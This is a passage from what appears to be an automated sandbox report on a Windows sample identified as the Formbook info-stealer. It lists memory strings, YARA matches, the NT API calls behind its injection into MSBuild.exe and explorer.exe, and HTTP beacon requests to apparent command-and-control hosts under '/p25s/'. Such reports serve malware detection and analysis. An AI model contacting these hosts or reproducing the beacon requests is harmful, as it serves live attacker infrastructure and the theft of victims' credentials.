          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com/p25s/www.desipizza.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp/p25s/www.associazionefaber.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvpReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com/p25s/www.allsttk.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.com/p25s/
          Source: unknown, DNS traffic detected: queries for: www.anbietertest.com
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1 Host: www.anbietertest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1 Host: www.hblcfl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1 Host: www.desipizza.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1 Host: www.couldskuathink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.582276153.000000000E3F1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe PID: 1092, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: MSBuild.exe PID: 2808, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 5908, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010325813_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D823_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D25DD3_2_010D25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E03_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101841F3_2_0101841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CD4663_2_010CD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C44963_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DDFCE3_2_010DDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1FF13_2_010D1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CD6163_2_010CD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01026E303_2_01026E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2EF73_2_010D2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0100B150 appears 133 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A35C NtCreateFile,3_2_0041A35C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A53B NtAllocateVirtualMemory,3_2_0041A53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01049910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010499A0 NtCreateSection,LdrInitializeThunk,3_2_010499A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049840 NtDelayExecution,LdrInitializeThunk,3_2_01049840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01049860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010498F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010498F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01049A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A20 NtResumeThread,LdrInitializeThunk,3_2_01049A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A50 NtCreateFile,LdrInitializeThunk,3_2_01049A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049540 NtReadFile,LdrInitializeThunk,3_2_01049540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010495D0 NtClose,LdrInitializeThunk,3_2_010495D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049710 NtQueryInformationToken,LdrInitializeThunk,3_2_01049710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049780 NtMapViewOfSection,LdrInitializeThunk,3_2_01049780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010497A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010497A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01049660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010496E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010496E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049950 NtQueueApcThread,3_2_01049950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010499D0 NtCreateProcessEx,3_2_010499D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049820 NtEnumerateKey,3_2_01049820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104B040 NtSuspendThread,3_2_0104B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010498A0 NtWriteVirtualMemory,3_2_010498A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049B00 NtSetValueKey,3_2_01049B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A3B0 NtGetContextThread,3_2_0104A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A10 NtQuerySection,3_2_01049A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A80 NtOpenDirectoryObject,3_2_01049A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049520 NtWaitForSingleObject,3_2_01049520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104AD30 NtSetContextThread,3_2_0104AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049560 NtWriteFile,3_2_01049560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010495F0 NtQueryInformationFile,3_2_010495F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A710 NtOpenProcessToken,3_2_0104A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049730 NtQueryVirtualMemory,3_2_01049730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049760 NtOpenProcess,3_2_01049760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049770 NtSetInformationFile,3_2_01049770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A770 NtOpenThread,3_2_0104A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049FE0 NtCreateMutant,3_2_01049FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049610 NtEnumerateValueKey,3_2_01049610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049650 NtQueryValueKey,3_2_01049650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049670 NtQueryInformationProcess,3_2_01049670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010496D0 NtCreateKey,3_2_010496D0
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.342450327.0000000003A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.351962017.0000000008A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000000.302945463.0000000000708000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJFfV.exeD vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.352005320.0000000008BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
